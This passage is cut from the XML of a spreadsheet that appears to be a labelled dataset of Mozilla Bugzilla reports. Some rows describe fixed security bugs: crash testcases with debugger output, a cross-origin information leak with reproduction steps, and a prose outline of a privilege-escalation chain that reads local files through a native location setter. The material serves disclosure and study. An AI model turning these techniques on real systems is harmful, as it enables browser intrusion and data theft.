          <t>All</t>
        </is>
      </c>
      <c r="N2636" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2636" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2636" t="inlineStr">
        <is>
          <t>[sg:critical?], fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q2636" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2636" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2636" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2636" t="n">
        <v>1</v>
      </c>
      <c r="U2636" t="n">
        <v>0</v>
      </c>
      <c r="V2636" t="n">
        <v>27</v>
      </c>
      <c r="W2636" t="inlineStr">
        <is>
          <t>for (a = 0; a &lt; 8; ++a) {
    if (a) {
        Proxy.create({}).t()
    }
}
crashes js opt shell on TM tip with -j at js_LookupPropertyWithFlags and asserts js debug shell on TM tip with -j at Assertion failure: isNative(), at ../jsscope.h:549
Tested on 64-bit Ubuntu Linux 10.04 and changeset tm-42457-f423fbc93e3f. Assuming related to harmony:proxies. Doesn't seem related to bug 566908.
Console stdout:
Program received signal SIGSEGV, Segmentation fault.
0x000000000046673d in js_LookupPropertyWithFlags ()
(gdb) bt
#0  0x000000000046673d in js_LookupPropertyWithFlags ()
#1  0x0000000000519d87 in js::TraceRecorder::test_property_cache(JSObject*, nanojit::LIns*, JSObject*&amp;, js::PCVal&amp;) ()
#2  0x0000000000524424 in js::TraceRecorder::record_JSOP_CALLPROP() ()
#3  0x0000000000527e4d in js::TraceRecorder::monitorRecording(JSOp) ()
#4  0x000000000054d64a in js_Interpret ()
#5  0x0000000000458421 in js_Execute ()
#6  0x000000000040b6d6 in JS_ExecuteScript ()
#7  0x00000000004069e5 in Process(JSContext*, JSObject*, char*, int) ()
#8  0x0000000000407269 in main ()
(gdb) x/i $rip
=&gt; 0x46673d &lt;js_LookupPropertyWithFlags+189&gt;:	cmp    (%rdx),%rbx
(gdb) x/b $rdx
0xffffffff:	Cannot access memory at address 0xffffffff</t>
        </is>
      </c>
      <c r="X2636" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2637">
      <c r="A2637" t="n">
        <v>501270</v>
      </c>
      <c r="B2637" t="inlineStr">
        <is>
          <t>2009-06-29 18:24:28 -0700</t>
        </is>
      </c>
      <c r="C2637" t="inlineStr">
        <is>
          <t>Assertion failure: !fp-&gt;fun || !(fp-&gt;fun-&gt;flags &amp; JSFUN_HEAVYWEIGHT) || fp-&gt;callobj</t>
        </is>
      </c>
      <c r="D2637" t="inlineStr">
        <is>
          <t>2009-09-18 14:12:05 -0700</t>
        </is>
      </c>
      <c r="E2637" t="n">
        <v>1</v>
      </c>
      <c r="F2637" t="n">
        <v>1</v>
      </c>
      <c r="G2637" t="n">
        <v>3</v>
      </c>
      <c r="H2637" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2637" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2637" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2637" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L2637" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2637" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2637" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2637" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2637" t="inlineStr">
        <is>
          <t>[sg:investigate] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q2637" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2637" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2637" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2637" t="n">
        <v>1</v>
      </c>
      <c r="U2637" t="n">
        <v>0</v>
      </c>
      <c r="V2637" t="n">
        <v>30</v>
      </c>
      <c r="W2637" t="inlineStr">
        <is>
          <t>browser only, js1_5/extensions/regress-361964.js on mac and nt at least. security sensitive until I can find the regressor.
Assertion failure: !fp-&gt;fun || !(fp-&gt;fun-&gt;flags &amp; JSFUN_HEAVYWEIGHT) || fp-&gt;callobj, at /work/mozilla/builds/1.9.0/mozilla/js/src/jsinterp.c:663</t>
        </is>
      </c>
      <c r="X2637" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2638">
      <c r="A2638" t="n">
        <v>1294783</v>
      </c>
      <c r="B2638" t="inlineStr">
        <is>
          <t>2016-08-12 10:47:16 -0700</t>
        </is>
      </c>
      <c r="C2638" t="inlineStr">
        <is>
          <t>Add Tab Center data pulls to presto for access from re:dash</t>
        </is>
      </c>
      <c r="D2638" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E2638" t="n">
        <v>1</v>
      </c>
      <c r="F2638" t="n">
        <v>1</v>
      </c>
      <c r="G2638" t="n">
        <v>6</v>
      </c>
      <c r="H2638" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2638" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J2638" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K2638" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2638" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2638" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2638" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2638" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2638" t="inlineStr"/>
      <c r="Q2638" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2638" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2638" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2638" t="n">
        <v>1</v>
      </c>
      <c r="U2638" t="n">
        <v>0</v>
      </c>
      <c r="V2638" t="n">
        <v>4</v>
      </c>
      <c r="W2638" t="inlineStr">
        <is>
          <t>s3n://net-mozaws-prod-us-west-2-pipeline-analysis/isegall/vtabs_daily/v1/activity_date=[date]</t>
        </is>
      </c>
      <c r="X2638" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2639">
      <c r="A2639" t="n">
        <v>136325</v>
      </c>
      <c r="B2639" t="inlineStr">
        <is>
          <t>2002-04-09 00:13:28 -0700</t>
        </is>
      </c>
      <c r="C2639" t="inlineStr">
        <is>
          <t>bug_email.pl uses /usr/bin/perl instead of ...bonsaitools/bin/perl</t>
        </is>
      </c>
      <c r="D2639" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:29 -0800</t>
        </is>
      </c>
      <c r="E2639" t="n">
        <v>1</v>
      </c>
      <c r="F2639" t="n">
        <v>1</v>
      </c>
      <c r="G2639" t="n">
        <v>4</v>
      </c>
      <c r="H2639" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2639" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2639" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2639" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L2639" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2639" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2639" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2639" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2639" t="inlineStr"/>
      <c r="Q2639" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2639" t="inlineStr">
        <is>
          <t>trivial</t>
        </is>
      </c>
      <c r="S2639" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T2639" t="n">
        <v>1</v>
      </c>
      <c r="U2639" t="n">
        <v>0</v>
      </c>
      <c r="V2639" t="n">
        <v>4</v>
      </c>
      <c r="W2639" t="inlineStr">
        <is>
          <t>Since the default perl is /usr/bonsaitools/bin/perl the perl files in contrib
directory sould also use that one. At least bug_email.pl,
bugzilla_email_append.pl and gnats2bz.pl use the /usr/bin/perl.</t>
        </is>
      </c>
      <c r="X2639" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2640">
      <c r="A2640" t="n">
        <v>514960</v>
      </c>
      <c r="B2640" t="inlineStr">
        <is>
          <t>2009-09-06 12:52:16 -0700</t>
        </is>
      </c>
      <c r="C2640" t="inlineStr">
        <is>
          <t>[1.9.0]Data from Faulting Address controls Branch Selection starting at gklayout!nsCachedStyleData::GetStyleDisplay</t>
        </is>
      </c>
      <c r="D2640" t="inlineStr">
        <is>
          <t>2009-12-01 03:17:13 -0800</t>
        </is>
      </c>
      <c r="E2640" t="n">
        <v>1</v>
      </c>
      <c r="F2640" t="n">
        <v>1</v>
      </c>
      <c r="G2640" t="n">
        <v>3</v>
      </c>
      <c r="H2640" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2640" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2640" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K2640" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L2640" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2640" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2640" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2640" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2640" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q2640" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2640" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2640" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2640" t="n">
        <v>1</v>
      </c>
      <c r="U2640" t="n">
        <v>0</v>
      </c>
      <c r="V2640" t="n">
        <v>17</v>
      </c>
      <c r="W2640" t="inlineStr">
        <is>
          <t>Created attachment 398970
stack etc 
see testcase https://bugzilla.mozilla.org/attachment.cgi?id=316799
Loading this site hang Firefox 1.9.0 Debug Builds (seem not affecting 1.9.1). 
!exploitable report:
(838.b20): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=ddddddf9 ebx=7ffd9000 ecx=ddddddf9 edx=046771a0 esi=00011490 edi=7c911460
eip=024ab51c esp=0012ca00 ebp=0012ca08 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
gklayout!nsCachedStyleData::GetStyleDisplay+0xc:
024ab51c 83780400        cmp     dword ptr [eax+4],0  ds:0023:ddddddfd=????????
0:000&gt; !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
*** WARNING: Unable to verify checksum for C:\work\mozilla\builds\1.9.0\mozilla\firefox-debug\dist\bin\components\gkwidget.dll
*** WARNING: Unable to verify checksum for C:\work\mozilla\builds\1.9.0\mozilla\firefox-debug\dist\bin\components\tkitcmps.dll
Exception Faulting Address: 0xffffffffddddddfd
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation
Faulting Instruction:024ab51c cmp dword ptr [eax+4],0
Basic Block:
    024ab51c cmp dword ptr [eax+4],0
       Tainted Input Operands: eax
    024ab520 je gklayout!nscachedstyledata::getstyledisplay+0x20 (024ab530)
       Tainted Input Operands: ZeroFlag
Exception Hash (Major/Minor): 0x3f274d05.0x73176a3a
Stack Trace:
gklayout!nsCachedStyleData::GetStyleDisplay+0xc
gklayout!nsStyleContext::GetStyleDisplay+0x14
gklayout!nsIFrame::GetStyleDisplay+0x3b
gklayout!nsLayoutUtils::GetFloatFromPlaceholder+0x37
gklayout!nsLineLayout::ReflowFrame+0x47f
gklayout!nsBlockFrame::ReflowInlineFrame+0x69
gklayout!nsBlockFrame::DoReflowInlineFrames+0x1fc
gklayout!nsBlockFrame::ReflowInlineFrames+0xeb
gklayout!nsBlockFrame::ReflowLine+0x2cc
gklayout!nsBlockFrame::ReflowDirtyLines+0x561
gklayout!nsBlockFrame::Reflow+0x28b
gklayout!nsContainerFrame::ReflowChild+0xe6
gklayout!nsColumnSetFrame::ReflowChildren+0x417
gklayout!nsColumnSetFrame::Reflow+0x32e
gklayout!nsBlockReflowContext::ReflowBlock+0x1a3
gklayout!nsBlockFrame::ReflowBlockFrame+0x6b3
gklayout!nsBlockFrame::ReflowLine+0xd2
gklayout!nsBlockFrame::ReflowDirtyLines+0x561
gklayout!nsBlockFrame::Reflow+0x28b
gklayout!nsBlockReflowContext::ReflowBlock+0x1a3
gklayout!nsBlockFrame::ReflowBlockFrame+0x6b3
gklayout!nsBlockFrame::ReflowLine+0xd2
gklayout!nsBlockFrame::ReflowDirtyLines+0x561
gklayout!nsBlockFrame::Reflow+0x28b
gklayout!nsContainerFrame::ReflowChild+0xe6
gklayout!CanvasFrame::Reflow+0x13c
gklayout!nsContainerFrame::ReflowChild+0xe6
gklayout!nsHTMLScrollFrame::ReflowScrolledFrame+0x32e
gklayout!nsHTMLScrollFrame::ReflowContents+0x53
gklayout!nsHTMLScrollFrame::Reflow+0x249
gklayout!nsContainerFrame::ReflowChild+0xe6
gklayout!ViewportFrame::Reflow+0x15d
gklayout!PresShell::DoReflow+0x2eb
gklayout!PresShell::ProcessReflowCommands+0xf3
gklayout!PresShell::DoFlushPendingNotifications+0x189
gklayout!PresShell::ReflowEvent::Run+0x81
xpcom_core!nsThread::ProcessNextEvent+0x1fa
xpcom_core!NS_ProcessNextEvent_P+0x53
gkwidget!nsBaseAppShell::Run+0x5d
tkitcmps!nsAppStartup::Run+0x6b
xul!XRE_main+0x2edf
firefox!NS_internal_main+0x2b2
firefox!wmain+0x119
firefox!__tmainCRTStartup+0x1a6
firefox!wmainCRTStartup+0xd
kernel32!BaseProcessStart+0x23
Instruction Address: 0x00000000024ab51c
Description: Data from Faulting Address controls Branch Selection
Short Description: TaintedDataControlsBranchSelection
Exploitability Classification: UNKNOWN
Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at gklayout!nsCachedStyleData::GetStyleDisplay+0x000000000000000c (Hash=0x3f274d05.0x73176a3a)
The data from the faulting address is later used to determine whether or not a branch is taken.</t>
        </is>
      </c>
      <c r="X2640" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2641">
      <c r="A2641" t="n">
        <v>431253</v>
      </c>
      <c r="B2641" t="inlineStr">
        <is>
          <t>2008-04-28 16:40:15 -0700</t>
        </is>
      </c>
      <c r="C2641" t="inlineStr">
        <is>
          <t>Create a single site for buildbot/talos/tinderbox documentation</t>
        </is>
      </c>
      <c r="D2641" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2641" t="n">
        <v>1</v>
      </c>
      <c r="F2641" t="n">
        <v>1</v>
      </c>
      <c r="G2641" t="n">
        <v>5</v>
      </c>
      <c r="H2641" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2641" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2641" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2641" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2641" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2641" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2641" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2641" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2641" t="inlineStr"/>
      <c r="Q2641" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2641" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2641" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2641" t="n">
        <v>1</v>
      </c>
      <c r="U2641" t="n">
        <v>0</v>
      </c>
      <c r="V2641" t="n">
        <v>14</v>
      </c>
      <c r="W2641" t="inlineStr">
        <is>
          <t>Per my discussion with John today, we are having trouble with the current array of buildbot/talos/tinderbox documentation pages when it comes to tier one support.  We really need all of these sites combined into one with a single list of all machines we should do tier one support for and a clear, concise list of actions to take for each group of machines.
Here is the list we currently look at:
http://wiki.mozilla.org/Build:Farm
http://wiki.mozilla.org/BuildbotTestFarmUse
https://intranet.mozilla.org/Build:Farm:Tinderbox_Maintenance
http://wiki.mozilla.org/Buildbot/IT_Support_Document
http://wiki.mozilla.org/Buildbot/IT_Talos_Support_Document
We should do the same for the password list, but not in this bug.
Would like this sooner rather than later if possible given we had 2 issues with tier one support over the last week.</t>
        </is>
      </c>
      <c r="X2641" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2642">
      <c r="A2642" t="n">
        <v>870603</v>
      </c>
      <c r="B2642" t="inlineStr">
        <is>
          <t>2013-05-09 16:24:09 -0700</t>
        </is>
      </c>
      <c r="C2642" t="inlineStr">
        <is>
          <t>[MMS] Multi-recipient: completing # or auto-search entry with ; or ENTER erases content</t>
        </is>
      </c>
      <c r="D2642" t="inlineStr">
        <is>
          <t>2013-10-16 00:59:51 -0700</t>
        </is>
      </c>
      <c r="E2642" t="n">
        <v>1</v>
      </c>
      <c r="F2642" t="n">
        <v>1</v>
      </c>
      <c r="G2642" t="n">
        <v>6</v>
      </c>
      <c r="H2642" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2642" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J2642" t="inlineStr">
        <is>
          <t>Gaia::SMS</t>
        </is>
      </c>
      <c r="K2642" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2642" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2642" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N2642" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2642" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2642" t="inlineStr"/>
      <c r="Q2642" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2642" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2642" t="inlineStr">
        <is>
          <t>1.1 CS (11may)</t>
        </is>
      </c>
      <c r="T2642" t="n">
        <v>1</v>
      </c>
      <c r="U2642" t="n">
        <v>0</v>
      </c>
      <c r="V2642" t="n">
        <v>7</v>
      </c>
      <c r="W2642" t="inlineStr">
        <is>
          <t>In latest moz-central, entering a number or typing a contact name and then pressing ; or ENTER erases the contact element. The top of this is actually barely visible, thus, it looks like the tile that represents the contact is created with no content, possibly.</t>
        </is>
      </c>
      <c r="X2642" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2643">
      <c r="A2643" t="n">
        <v>1379614</v>
      </c>
      <c r="B2643" t="inlineStr">
        <is>
          <t>2017-07-10 05:38:18 -0700</t>
        </is>
      </c>
      <c r="C2643" t="inlineStr">
        <is>
          <t>Topline Summary search aggregates are high since June 18, 2017</t>
        </is>
      </c>
      <c r="D2643" t="inlineStr">
        <is>
          <t>2022-07-26 12:18:12 -0700</t>
        </is>
      </c>
      <c r="E2643" t="n">
        <v>1</v>
      </c>
      <c r="F2643" t="n">
        <v>1</v>
      </c>
      <c r="G2643" t="n">
        <v>2</v>
      </c>
      <c r="H2643" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2643" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J2643" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2643" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2643" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2643" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2643" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2643" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2643" t="inlineStr"/>
      <c r="Q2643" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2643" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2643" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2643" t="n">
        <v>1</v>
      </c>
      <c r="U2643" t="n">
        <v>0</v>
      </c>
      <c r="V2643" t="n">
        <v>5</v>
      </c>
      <c r="W2643" t="inlineStr">
        <is>
          <t>The search aggregates in topline_summary are high in the later weeks of June 2017, most likely due to double counting caused by in-content searches. This also affected the search rollup repository.</t>
        </is>
      </c>
      <c r="X2643" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2644">
      <c r="A2644" t="n">
        <v>1731614</v>
      </c>
      <c r="B2644" t="inlineStr">
        <is>
          <t>2021-09-20 07:27:04 -0700</t>
        </is>
      </c>
      <c r="C2644" t="inlineStr">
        <is>
          <t>MediaError message property leaks information on cross-origin same-site pages</t>
        </is>
      </c>
      <c r="D2644" t="inlineStr">
        <is>
          <t>2024-05-30 10:36:38 -0700</t>
        </is>
      </c>
      <c r="E2644" t="n">
        <v>1</v>
      </c>
      <c r="F2644" t="n">
        <v>1</v>
      </c>
      <c r="G2644" t="n">
        <v>3</v>
      </c>
      <c r="H2644" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2644" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2644" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K2644" t="inlineStr">
        <is>
          <t>Firefox 92</t>
        </is>
      </c>
      <c r="L2644" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2644" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2644" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2644" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2644" t="inlineStr">
        <is>
          <t>[domsecurity-backlog1][adv-main102+]</t>
        </is>
      </c>
      <c r="Q2644" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2644" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2644" t="inlineStr">
        <is>
          <t>102 Branch</t>
        </is>
      </c>
      <c r="T2644" t="n">
        <v>1</v>
      </c>
      <c r="U2644" t="n">
        <v>0</v>
      </c>
      <c r="V2644" t="n">
        <v>10</v>
      </c>
      <c r="W2644" t="inlineStr">
        <is>
          <t>Created attachment 9242074
firefox_media_error.html
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
Steps to reproduce:
1. Download the attached HTML page
2. Run a server on port 9898 in the download directory: e.g., `python3 -m http.server 9898` or `php -S 0.0.0.0:9898`
3. Go to http://localhost:9898/firefox_media_error.html
4. Observe the results
5. Start another server on port 9999 in the directory: e.g., `python3-m http.server 9999`
6. Observe the results
Actual results:
The cross-origin response with different ports (same-site) leaks information in the MediaError message property. In step 4, this response error message is `2152398861: Request failed`. In step 6, this response error message is `404: File not found`.
Expected results:
According to https://bugzilla.mozilla.org/show_bug.cgi?id=1450853 the MediaError message property should be `Failed to open media` for all cross-origin responses to prevent XS-Attacks such as login detection. 
For cross-site pages and same-site pages with different subdomains, the fix implemented in https://hg.mozilla.org/integration/autoland/rev/6b518e88bdf9 works. For same-site pages with different ports, the fix is not applied and an attacker has access to the same values as a same-origin page.</t>
        </is>
      </c>
      <c r="X2644" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2645">
      <c r="A2645" t="n">
        <v>1178058</v>
      </c>
      <c r="B2645" t="inlineStr">
        <is>
          <t>2015-06-27 19:52:29 -0700</t>
        </is>
      </c>
      <c r="C2645" t="inlineStr">
        <is>
          <t>It's possible to read local files or perform privilege escalation by using a native setter</t>
        </is>
      </c>
      <c r="D2645" t="inlineStr">
        <is>
          <t>2024-05-30 09:02:44 -0700</t>
        </is>
      </c>
      <c r="E2645" t="n">
        <v>1</v>
      </c>
      <c r="F2645" t="n">
        <v>1</v>
      </c>
      <c r="G2645" t="n">
        <v>3</v>
      </c>
      <c r="H2645" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2645" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2645" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2645" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L2645" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2645" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2645" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2645" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2645" t="inlineStr">
        <is>
          <t>[b2g-adv-main2.5+][adv-main39+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q2645" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2645" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2645" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T2645" t="n">
        <v>1</v>
      </c>
      <c r="U2645" t="n">
        <v>0</v>
      </c>
      <c r="V2645" t="n">
        <v>72</v>
      </c>
      <c r="W2645" t="inlineStr">
        <is>
          <t>Created attachment 8626955
accessFileWithNativeSetter-testcase-new.html
This one is a really complex issue and it's me so I'm really going to try to condense this down.
https://mxr.mozilla.org/mozilla-central/source/dom/xml/nsXMLPrettyPrinter.cpp#114
You can start reading there to begin to understand this.  Just get a general idea of what is happening as it's not terribly important except for one key detail.  That is the fact that it is from c++ code that the prettyprint bindings for xml data are loaded.  This involves importing two style sheets into the document, both of which don't show up through document.childNodes, but references to them are accessible through document.styleSheets.
These references get the normal native anonymous content protection goodness, but that can be bypassed with access to the XBL execution context.  I'm using pieces of my older work from bug 1045034 for that bypass, but I'm fairly close I believe to having another method of achieving the same thing.
Now to the interesting parts. Once you have access to these references one who looks will notice that the prototypes accessible from the ownerNode of the style sheet are prototypes which provide access to native methods.  Here I'm tracing the __proto__ chain up to the Object prototype and using the native __lookupSetter__ method to bypass restrictions on windows that I shouldn't have access to.
Using this over powered __lookupSetter__ function I then get the location setter of a window that is inaccessible to me otherwise.  With this location setter it's possible to bypass all restriction when setting the location property of any window except those that are chrome privileged.
In the testcase I'm attaching with this I use this location setter on a pdf viewer window to inject javascript into it via a javascript URI.  I then have it load a local file because resource:// pages have that ability and still using the same OP location setter I show javascript execution in that window to prove that in fact the contents of the file loaded are fully accessible from content.
There, and that's as condensed down as possible for an issue this complicated I believe(for me).  I still have to mention that it's also possible to manipulate about:home windows to achieve chrome privilege escalation but without a way to inject script into it, I thought this was more interesting.
I hope I didn't kill you guys with all that, and also let me know if this works in windows ok.  you OSX guys will just have to trust the word of others.</t>
        </is>
      </c>
      <c r="X2645" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2646">
      <c r="A2646" t="n">
        <v>319847</v>
      </c>
      <c r="B2646" t="inlineStr">
        <is>
          <t>2005-12-10 22:46:45 -0800</t>
        </is>
      </c>
      <c r="C2646" t="inlineStr">
        <is>
          <t>CVE-2006-0296 XULDocument.persist() allows an attacker to inject bogus RDF data into localstore.rdf</t>
        </is>
      </c>
      <c r="D2646" t="inlineStr">
        <is>
          <t>2007-04-01 15:32:37 -0700</t>
        </is>
      </c>
      <c r="E2646" t="n">
        <v>1</v>
      </c>
      <c r="F2646" t="n">
        <v>1</v>
      </c>
      <c r="G2646" t="n">
        <v>3</v>
      </c>
      <c r="H2646" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2646" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2646" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2646" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2646" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2646" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2646" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2646" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
